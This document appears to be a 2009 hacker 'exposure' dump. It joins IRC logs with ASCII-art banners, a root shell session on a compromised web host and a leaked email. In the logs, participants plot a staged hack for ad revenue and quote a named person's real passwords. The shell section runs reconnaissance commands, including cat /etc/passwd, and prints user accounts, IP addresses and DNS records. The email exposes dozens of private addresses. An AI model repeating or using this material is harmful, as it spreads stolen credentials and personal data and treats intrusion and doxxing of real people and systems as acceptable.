09:26 (BSDGurl) they irc
09:26 (BSDGurl) the
09:26 (RoMeO) yeah
09:26 (RoMeO) its ok lol
09:26 (BSDGurl) i didn't want to like go into with him
09:27 (BSDGurl) i was just like do what you think is best:/
09:27 (BSDGurl) i didn't know what to say
09:27 (RoMeO) haha, what is he doing anyways
09:27 (RoMeO) i just saw a rant
09:27 (BSDGurl) i know
09:27 (BSDGurl) i don't know what
09:28 (RoMeO) i think people should move on already
09:28 (BSDGurl) Me TOO
09:28 (RoMeO) lol!
09:28 (BSDGurl) thank you
09:28 (RoMeO) sites get hacked all the time
09:28 (BSDGurl) you know what i said
09:28 (BSDGurl) think about this
09:28 (BSDGurl) you know if you staged
09:28 (BSDGurl) that
09:29 (BSDGurl) and threw those ads
09:29 (BSDGurl) back up
09:29 (RoMeO) stunt
09:29 (BSDGurl) you would make bank
09:29 (RoMeO) yes.
09:29 (BSDGurl) :)
09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
09:29 (RoMeO) lolol
09:29 (BSDGurl) yes
09:29 (BSDGurl) think about that
09:29 (RoMeO) it got more backlinmks than google over night
09:29 (BSDGurl) membership down
09:30 (BSDGurl) etc
09:30 (BSDGurl) now look
09:30 (BSDGurl) cash in
09:30 (BSDGurl) think about it for darkmindz too
09:30 (BSDGurl) hahaha
09:30 (RoMeO) lmfao
09:30 (RoMeO) 'HACKED AND EXPOSED'
09:30 (BSDGurl) pwn xlink
09:31 -> BSDGurl dies
09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
09:31 (BSDGurl) yes
09:31 (RoMeO) fun
09:31 (RoMeO) if i ever need money in uni, thats plan A
09:31 (BSDGurl) biber can be fall guy
09:31 (BSDGurl) hahaha
09:31 (RoMeO) ^^
09:32 (BSDGurl) let me go back to art shit
09:32 (RoMeO) oh enjoy
09:32 (BSDGurl) i just wanted to tell you have a safe trip
09:33 (RoMeO) thank you <3
09:33 (BSDGurl) if i didnt get to talk
09:33 (RoMeO) ^_^
09:33 (BSDGurl) <3 you are very welcome
--- Log closed Fri Jun 19 09:34:04 2009
--- Log opened Sun Jun 21 09:24:55 2009
09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
09:25 (RoMeO) mm?
09:28 (RoMeO) what are you talking about lol
09:29 ({Glyph_Home}) GSO has had issues this past week.
09:29 ({Glyph_Home}) I thought perhaps you were the reason.
09:29 (RoMeO) because rsnake released a DoS tool
09:29 (RoMeO) nope
09:29 ({Glyph_Home}) No.. the litespeed issue
09:29 (RoMeO) my issues dont go on lagging web servers
09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
09:30 (RoMeO) that too
09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
09:31 (RoMeO) about
09:31 ({Glyph_Home}) Gonna make my 'recommends' to the admins this week.
09:31 (RoMeO) i find it funny how staff at 'black hat forums' get to be staff at ' gov sec'
09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
09:32 -> {Glyph_Home} chuckles
09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
09:32 (RoMeO) lolol
09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
09:33 (RoMeO) so all good
09:33 ({Glyph_Home}) Used to..
09:33 (RoMeO) but people who are going down soon are botnet communities for example
09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
09:34 (RoMeO) just cleaning the net
09:34 ({Glyph_Home}) Straight out of the 'toyshop'
09:34 (RoMeO) :]
09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops'
09:36 (RoMeO) haha
09:36 (RoMeO) wont be done under antisec
09:36 (RoMeO) antisec is kept for 'security' issues
09:36 (RoMeO) this is, botnet and skids crap
09:36 ({Glyph_Home}) hmmm...
09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
09:37 (RoMeO) all good so far
09:37 (RoMeO) lcirc and indoirc got comprimised
09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
09:38 ({Glyph_Home}) w00f
09:38 (RoMeO) ;)
09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
09:38 (RoMeO) well
09:38 (RoMeO) the idea is
09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
09:39 (RoMeO) out in the public and all over the net
09:39 (RoMeO) let the authorities deal with that
09:39 ({Glyph_Home}) roflmao
09:39 (RoMeO) :]
09:39 (RoMeO) brb
--- Log closed Sun Jun 21 09:44:31 2009
--- Log opened Mon Jun 22 16:15:04 2009
16:15 (Glyph) ?
16:15 (Glyph) Oh.. that stuff
16:15 (Glyph) Old stuff.. was playing more or less.
16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
16:16 (Glyph) All that is at least five years old or older.
16:16 (Glyph) circa 2005
16:17 (RoMeO) yeah
16:17 (RoMeO) thinking of setting up a box for dark
16:17 (RoMeO) see what is he going to do
16:17 (RoMeO) ofcourse everything will be patched to log in's and out's // HOOKIN.. HOOKOUT..
16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
16:18 (RoMeO) yeah
16:18 (RoMeO) sure do
16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
16:18 (RoMeO) lol
16:19 (RoMeO) thats why i want to see what is he goign to do on a box
16:19 (RoMeO) anyone can talk
16:19 (RoMeO) specially on the internet
16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
16:19 (Glyph) snap!
16:19 (RoMeO) :P
16:19 (RoMeO) thats what i heared from everyone so far
16:19 (RoMeO) i will even give him a none chrooted shell
16:19 (Glyph) Have you lost your mind?
16:19 (RoMeO) lol
16:19 (Glyph) Damn if I'd trust him that far.
16:20 (RoMeO) it will be an empty box
16:20 (Glyph) jailed, maybe.. unjailed never.
16:20 (RoMeO) and every shell is modified to log to a remote system
16:20 (Glyph) Now yer sounding like me.
16:20 (RoMeO) i will sit there wth a cop of tea and tail -f
16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here'
16:28 (RoMeO) reading stories about knuth
16:28 (RoMeO) how to own a continent for example
16:28 (RoMeO) that one is amazing
16:29 (Glyph) It's NOT hard.
16:29 (RoMeO) if you didnt read it, you should
16:38 (RoMeO) i was looking around dark for a while
16:38 (RoMeO) and what surprised me is
16:38 (RoMeO) his really low-quality passwords
16:38 (RoMeO) like
16:38 (RoMeO) 123123
16:38 (RoMeO) or 123pass
16:38 (RoMeO) etc
16:38 (RoMeO) made me go ?
16:39 (Glyph) almost as bad as qwerty12345
16:39 (RoMeO) yes
16:40 (RoMeO) just one more thing that shows he is talk-only
16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords' but using really weak passwords -does- mean something
16:40 (Glyph) worse yet.. he could be a c&p
16:40 (RoMeO) that would be so bad
16:43 (Glyph) Yeah.. it would.
16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
16:44 (RoMeO) hahaa
16:44 (RoMeO) why would we tho
16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
16:46 (RoMeO) when that happens i just log on a shell and explore ;p
16:46 (RoMeO) one more thing
16:46 (RoMeO) dark is a yahoo user
16:46 (RoMeO) that counts
16:47 (RoMeO) thats -100 sec points
16:47 (RoMeO) i do tag people by there email s too
16:47 (RoMeO) for example
16:47 (RoMeO) yahoo users, mostly newbies / females
16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
16:48 (RoMeO) gmail users are on top and above that comes the people with there own mail servers
16:48 (RoMeO) its alot deeper than that, but thats just a quick explanation :P
16:50 (RoMeO) found 2 passwords of dark in my db
16:50 (RoMeO) and they both fail
16:50 (RoMeO) hellohello is one of them -_-'
--- Log closed Mon Jun 22 16:55:25 2009
--- Log opened Tue Jun 23 17:19:55 2009
17:19 (Glyph) ?
17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
17:20 (Glyph) Ahhh...
17:21 (Glyph) He came up out of 64.127.41.18
17:22 (RoMeO) ah
17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
17:22 (Glyph) But it goes back to WestVirginia..
17:22 (RoMeO) yeah
17:23 (Glyph) Firm called Compucrash
17:23 (Glyph) Their webserver is at .3 of that range.
17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
17:23 (RoMeO) lol
17:24 (Glyph) That's when the MySQL threw the error code at me.
17:24 (Glyph) Then I checked the forums.
17:24 (Glyph) You wouldn't believe it.. PHPBB3
17:24 (Glyph) Pr0nsters have already been at it.
17:24 (RoMeO) lmao
17:24 (RoMeO) yea
17:25 (RoMeO) i saw that one
17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
17:25 (Glyph) Plus the bw is pricey as heck.
17:26 (Glyph) I'm heading home..
17:26 (Glyph) You have a good un.
17:26 (RoMeO) thanks
17:26 (RoMeO) enjoy
--- Log closed Tue Jun 23 17:31:25 2009
--- Log opened Wed Jun 24 17:11:08 2009
17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
--- Log closed Wed Jun 24 17:16:42 2009
--- Log opened Sat Jun 27 23:05:38 2009
23:09 8/[g</{Glyph_Home}8/(4/~glyph@mods.govsec.org8/)g8/]g you don't have anything to 'fear' from me mate.
23:10 8/[g</{Glyph_Home}8/(4/~glyph@mods.govsec.org8/)g8/]g I make sure I don't know anything.
// We make sure everyone else does..
23:46 8/[g</notrael8/(4/notrael@tdirc-F327CDE7.org8/)g8/]g hi
23:46 8/[g</notrael8/(4/notrael@tdirc-F327CDE7.org8/)g8/]g i like the ending you added to the dikline motto
23:46 8/[g</notrael8/(4/notrael@tdirc-F327CDE7.org8/)g8/]g "Never sell out, never surrender. Get in as anonymous, Leave with no trace.
--- Log closed Sun Jun 28 02:13:14 2009
_______ _______ _____
\ _ \ ___ __\ _ \ / | |
/ /_\ \\ \/ / /_\ \ / | |_
\ \_/ \> <\ \_/ \/ ^ /
\_____ /__/\_ \\_____ /\____ |
\/ \/ \/ |__|
.__ __ .__ .___
___ _|__|/ |______ | | ____________ ____ ____ __| _/______
\ \/ / \ __\__ \ | | / ___/\____ \_/ __ \_/ __ \ / __ |/ ___/
\ /| || | / __ \| |__\___ \ | |_> > ___/\ ___// /_/ |\___ \
\_/ |__||__| (____ /____/____ >| __/ \___ >\___ >____ /____ >
\/ \/ |__| \/ \/ \/ \/
__________ _________
\______ \_______ ____ / _____/ ____ ____
______ | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
/_____/ | | | | \( <_> ) \ ___/\ \___
|____| |__| \____/_______ /\___ >\___ >
\/ \/ \/
root@light [/]# hostname
light.co1.org
root@light [/]# uname -a
Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
root@light [/]# date
Tue Jun 23 20:06:26 EDT 2009
root@light [/]# cd /home
root@light [/home]# ls
./ blndbill/ .cpcpan/ deevour/ group88/ joshd/ lost+found/ nglgorg/ r00t/ timc/
../ blueacre/ cpeasyapache/ denial/ hadrys/ karbassi/ mapmap/ nickg/ radical/ timc14/
amp3dne/ bziem/ cprestore/ digital/ handknit/ kcole/ maraka/ noct/ rannman/ tmp/
animal/ cache/ cpzendinstall/ drireign/ harry3/ kidc/ mrwoot/ nycrob/ raven/ tradefx/
apadana/ cawn/ craig/ edgein/ hasting/ knokes/ msupike/ olliee/ robotey/ untitled/
aquota.user* cfurn/ ctcped/ fran459/ hastings/ kozmo/ munin/ pioneer/ russ43/ values/
army/ charice/ curator/ func88/ ircmilw/ kujio/ MySQL-install/ plumcree/ sheik/ vincent/
auxone/ chemmer/ daelenbe/ futonre/ jamesj/ kyle/ national/ porch46/ starr/ virtfs/
badassb/ christa/ danielc/ fxarbitr/ jb007/ lakeshor/ neptunes/ prime/ stopcand/ vitus/
bebe/ cmilone/ ddosmyi/ ganja/ jeffhem/ light/ netdevil/ psurge/ sub/ wrench/
berkel/ .cpan/ dear/ ganja51/ jer1h/ lithium/ netenberg/ qstud/ syscrash/ yasha/
billing/ cpapachebuild/ decalsby/ greg93/ jkaiser/ lost/ nglgnet/ quota.user* tickah/
root@light [/home]#
root@light [/home]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
amp3dne:x:32005:32006::/home/amp3dne:/usr/local/cpanel/bin/noshell
auxone:x:32006:32007::/home/auxone:/bin/false
badassb:x:32007:32008::/home/badassb:/usr/local/cpanel/bin/noshell
cache:x:32011:32012::/home/cache:/usr/local/cpanel/bin/noshell
cawn:x:32012:32013::/home/cawn:/bin/false
cfurn:x:32013:32014::/home/cfurn:/bin/false
cmilone:x:32016:32017::/home/cmilone:/usr/local/cpanel/bin/noshell
craig:x:32017:32018::/home/craig:/usr/local/cpanel/bin/noshell
dear:x:32021:32022::/home/dear:/bin/false
drireign:x:32024:32025::/home/drireign:/usr/local/cpanel/bin/noshell
fran459:x:32028:32029::/home/fran459:/usr/local/cpanel/bin/noshell
futonre:x:32030:32031::/home/futonre:/usr/local/cpanel/bin/noshell
greg93:x:32031:32032::/home/greg93:/usr/local/cpanel/bin/noshell
harry3:x:32034:32035::/home/harry3:/usr/local/cpanel/bin/noshell
jkaiser:x:32039:32040::/home/jkaiser:/usr/local/cpanel/bin/noshell
joshd:x:32040:32041::/home/joshd:/bin/false
kcole:x:32041:32042::/home/kcole:/usr/local/cpanel/bin/noshell
kidc:x:32042:32043::/home/kidc:/usr/local/cpanel/bin/noshell
kozmo:x:32043:32044::/home/kozmo:/usr/local/cpanel/bin/noshell
light:x:32047:32048::/home/light:/usr/local/cpanel/bin/noshell
lost:x:32049:32050::/home/lost:/usr/local/cpanel/bin/noshell
msupike:x:32057:32058::/home/msupike:/usr/local/cpanel/bin/noshell
neptunes:x:32058:32059::/home/neptunes:/bin/sh
nickg:x:32060:32061::/home/nickg:/usr/local/cpanel/bin/noshell
olliee:x:32061:32062::/home/olliee:/usr/local/cpanel/bin/noshell
pioneer:x:32063:32064::/home/pioneer:/usr/local/cpanel/bin/noshell
plumcree:x:32064:32065::/home/plumcree:/usr/local/cpanel/bin/noshell
porch46:x:32065:32066::/home/porch46:/usr/local/cpanel/bin/noshell
qstud:x:32066:32067::/home/qstud:/usr/local/cpanel/bin/noshell
rannman:x:32068:32069::/home/rannman:/usr/local/cpanel/bin/noshell
sheik:x:32079:32080::/home/sheik:/usr/local/cpanel/bin/noshell
starr:x:32081:32082::/home/starr:/usr/local/cpanel/bin/noshell
stopcand:x:32083:32084::/home/stopcand:/usr/local/cpanel/bin/noshell
timc14:x:32089:32090::/home/timc14:/usr/local/cpanel/bin/noshell
values:x:32090:32091::/home/values:/bin/sh
vitus:x:32091:32092::/home/vitus:/usr/local/cpanel/bin/noshell
yasha:x:32099:32100::/home/yasha:/usr/local/cpanel/bin/noshell
tickah:x:32103:32104::/home/tickah:/usr/local/cpanel/bin/noshell
charice:x:32106:32107::/home/charice:/bin/false
animal:x:32109:32110::/home/animal:/usr/local/cpanel/bin/noshell
ganja51:x:32110:32111::/home/ganja51:/bin/false
ganja:x:32111:32112::/home/ganja:/usr/local/cpanel/bin/noshell
mrwoot:x:32113:32114::/home/mrwoot:/usr/local/cpanel/bin/noshell
karbassi:x:32114:32115::/home/karbassi:/usr/local/cpanel/bin/noshell
nycrob:x:32115:32116::/home/nycrob:/bin/false
radical:x:32118:32119::/home/radical:/usr/local/cpanel/bin/noshell
jer1h:x:32119:32120::/home/jer1h:/bin/false
denial:x:32121:32122::/home/denial:/usr/local/cpanel/bin/noshell
jamesj:x:32123:32124::/home/jamesj:/usr/local/cpanel/bin/noshell
nglgnet:x:32124:32125::/home/nglgnet:/usr/local/cpanel/bin/noshell
nglgorg:x:32125:32126::/home/nglgorg:/usr/local/cpanel/bin/noshell
russ43:x:32126:32128::/home/russ43:/usr/local/cpanel/bin/noshell
berkel:x:32127:32129::/home/berkel:/usr/local/cpanel/bin/noshell
hastings:x:32128:32130::/home/hastings:/usr/local/cpanel/bin/noshell
knokes:x:32129:32131::/home/knokes:/usr/local/cpanel/bin/noshell
decalsby:x:32132:32134::/home/decalsby:/usr/local/cpanel/bin/noshell
lakeshor:x:32134:32136::/home/lakeshor:/usr/local/cpanel/bin/noshell
army:x:32136:32138::/home/army:/bin/false
curator:x:32138:32140::/home/curator:/bin/false
tradefx:x:32142:32144::/home/tradefx:/usr/local/cpanel/bin/noshell
national:x:32146:32148::/home/national:/usr/local/cpanel/bin/jailshell
robotey:x:32147:32149::/home/robotey:/bin/false
vincent:x:32148:32150::/home/vincent:/usr/local/cpanel/bin/noshell
psurge:x:32149:32151::/home/psurge:/usr/local/cpanel/bin/noshell
prime:x:32150:32152::/home/prime:/bin/false
digital:x:32151:32153::/home/digital:/usr/local/cpanel/bin/noshell
ddosmyi:x:32153:32155::/home/ddosmyi:/usr/local/cpanel/bin/noshell
blueacre:x:32155:32157::/home/blueacre:/usr/local/cpanel/bin/noshell
kujio:x:32157:32159::/home/kujio:/bin/false
untitled:x:32158:32160::/home/untitled:/usr/local/cpanel/bin/noshell
danielc:x:32159:32161::/home/danielc:/bin/false
billing:x:32163:32165::/home/billing:/usr/local/cpanel/bin/jailshell
syscrash:x:32164:32166::/home/syscrash:/usr/local/cpanel/bin/jailshell
hasting:x:32165:32167::/home/hasting:/usr/local/cpanel/bin/noshell
wrench:x:32166:32168::/home/wrench:/usr/local/cpanel/bin/noshell
apadana:x:32167:32169::/home/apadana:/usr/local/cpanel/bin/noshell
ircmilw:x:32169:32171::/home/ircmilw:/usr/local/cpanel/bin/noshell
blndbill:x:32170:32172::/home/blndbill:/usr/local/cpanel/bin/noshell
edgein:x:32171:32173::/home/edgein:/usr/local/cpanel/bin/noshell
hadrys:x:32172:32174::/home/hadrys:/usr/local/cpanel/bin/noshell
bebe:x:32173:32175::/home/bebe:/usr/local/cpanel/bin/noshell
mapmap:x:32176:32178::/home/mapmap:/usr/local/cpanel/bin/noshell
cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
cpanel-phpmyadmin:x:32008:32009::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
cpanel-phppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
kyle:x:32177:32179::/home/kyle:/bin/false
ctcped:x:32178:32180::/home/ctcped:/usr/local/cpanel/bin/noshell
fxarbitr:x:32179:32181::/home/fxarbitr:/usr/local/cpanel/bin/noshell
func88:x:32180:32182::/home/func88:/bin/bash
cpanelhorde:x:32010:32011::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32014:32015::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32020:32021::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32023:32024::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
christa:x:32181:32183::/home/christa:/usr/local/cpanel/bin/noshell
bziem:x:32182:32184::/home/bziem:/usr/local/cpanel/bin/noshell
jb007:x:32183:32185::/home/jb007:/usr/local/cpanel/bin/jailshell
timc:x:32185:32187::/home/timc:/usr/local/cpanel/bin/noshell
munin:x:32186:32188::/home/munin:/bin/bash
noct:x:32187:32189::/home/noct:/usr/local/cpanel/bin/jailshell
jeffhem:x:32188:32190::/home/jeffhem:/usr/local/cpanel/bin/noshell
chemmer:x:32189:32191::/home/chemmer:/usr/local/cpanel/bin/noshell
daelenbe:x:32190:32192::/home/daelenbe:/usr/local/cpanel/bin/noshell
deevour:x:32191:32193::/home/deevour:/bin/bash
raven:x:32192:32194::/home/raven:/usr/local/cpanel/bin/noshell
lithium:x:32193:32195::/home/lithium:/usr/local/cpanel/bin/noshell
netdevil:x:510:510::/home/netdevil:/usr/local/cpanel/bin/noshell
sub:x:511:511::/home/sub:/usr/local/cpanel/bin/noshell
r00t:x:512:512::/home/r00t:/usr/local/cpanel/bin/noshell
maraka:x:513:513::/home/maraka:/usr/local/cpanel/bin/noshell
root@light [/home]#
root@light [~]# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.181 Bcast:66.197.170.191 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:652037555 (621.8 MiB) TX bytes:1600708482 (1.4 GiB)
Interrupt:16 Base address:0xd000
eth0:1 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.182 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000
eth0:2 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.183 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000
eth0:3 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.185 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000
eth0:4 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.186 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000
eth0:5 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
inet addr:66.197.170.184 Bcast:66.197.170.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16 Base address:0xd000
gre0 Link encap:UNSPEC HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1476 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3605264865 (3.3 GiB) TX bytes:3605264865 (3.3 GiB)
tunl0 Link encap:IPIP Tunnel HWaddr
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
root@light [~]# cat /var/named/ownage.net.db
; Modified by Web Host Manager
; Zone File for ownage.net
$TTL 14400
@ 86400 IN SOA dns.vitalspeeds.com. support.vitalspeeds.com. (
2006111702
86400
7200
3600000
86400
)
ownage.net. 86400 IN NS dns.vitalspeeds.com.
ownage.net. 86400 IN NS ns2.vitalspeeds.com.
ownage.net. 14400 IN A 72.20.28.204
localhost.ownage.net. 14400 IN A 127.0.0.1
ownage.net. 14400 IN MX 0 ownage.net.
mail 14400 IN CNAME ownage.net.
www 14400 IN CNAME ownage.net.
ftp 14400 IN CNAME ownage.net.
absolute.ownage.net. 14400 IN A 72.20.28.205
talk.about.ownage.net. 14400 IN A 72.20.18.131
complete.ownage.net. 14400 IN A 72.20.28.206
_______ _______ .________
\ _ \ ___ __\ _ \ | ____/
/ /_\ \\ \/ / /_\ \ |____ \
\ \_/ \> <\ \_/ \/ \
\_____ /__/\_ \\_____ /______ /
\/ \/ \/ \/
__ .__ __ .__
_____ _____ | | ______ __________ | | __ ___/ |_|__| ____ ____ ______
/ \\__ \ | |/ / _ \/ ___/ _ \| | | | \ __\ |/ _ \ / \ / ___/
| Y Y \/ __ \| < <_> )___ ( <_> ) |_| | /| | | ( <_> ) | \\___ \
|__|_| (____ /__|_ \____/____ >____/|____/____/ |__| |__|\____/|___| /____ >
\/ \/ \/ \/ \/ \/
__________ _________
\______ \_______ ____ / _____/ ____ ____
______ | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
/_____/ | | | | \( <_> ) \ ___/\ \___
|____| |__| \____/_______ /\___ >\___ >
\/ \/ \/
Delivered-To: glafkos@gmail.com
Received: by 10.223.117.209 with SMTP id s17cs437044faq;
Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Return-Path: <glafk0s@hotmail.com>
Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
Thu, 2 Jul 2009 13:31:22 -0700
Message-ID: <BLU123-W96370B1DA99ABE688265BEB2F0@phx.gbl>
Return-Path: glafk0s@hotmail.com
Content-Type: multipart/alternative;
boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"
X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)
From: james knuth <glafk0s@hotmail.com>
To: <micronet@aol.com>, <mikespry.mdots@mdots.net>, <jstrat85@aol.com>,
<vlad@zealus.com>, <let995@yahoo.com>, <dejan@dwhost.net>,
<democreations@gmail.com>, <sales@hostforwebsite.com>,
<holeinthewallhosting@gmail.com>, <lucacri@gmail.com>, <k.ma@utoronto.ca>,
<dsecuya@gmail.com>, <peteslaughterbeck@yahoo.com>,
<michael.bastian@gmail.com>, <fletro@gmail.com>, <aalyazeedi@peo.gov.qa>,
<msprycha@makosolutions.com>, <glafkos@gmail.com>,
<horsepowerlounge@gmail.com>, <info@hostwebservice.com>,
<dave@bavariansolutions.com>, <keishaf18@yahoo.com>,
<adthorn@rochester.rr.com>, <mr22774556@live.com>, <vienna@consult.co.at>,
<bruno.matthys@gmail.com>
Subject: Makosolutions, LLC
Date: Thu, 2 Jul 2009 22:31:22 +0200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]
MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
- Hacked.
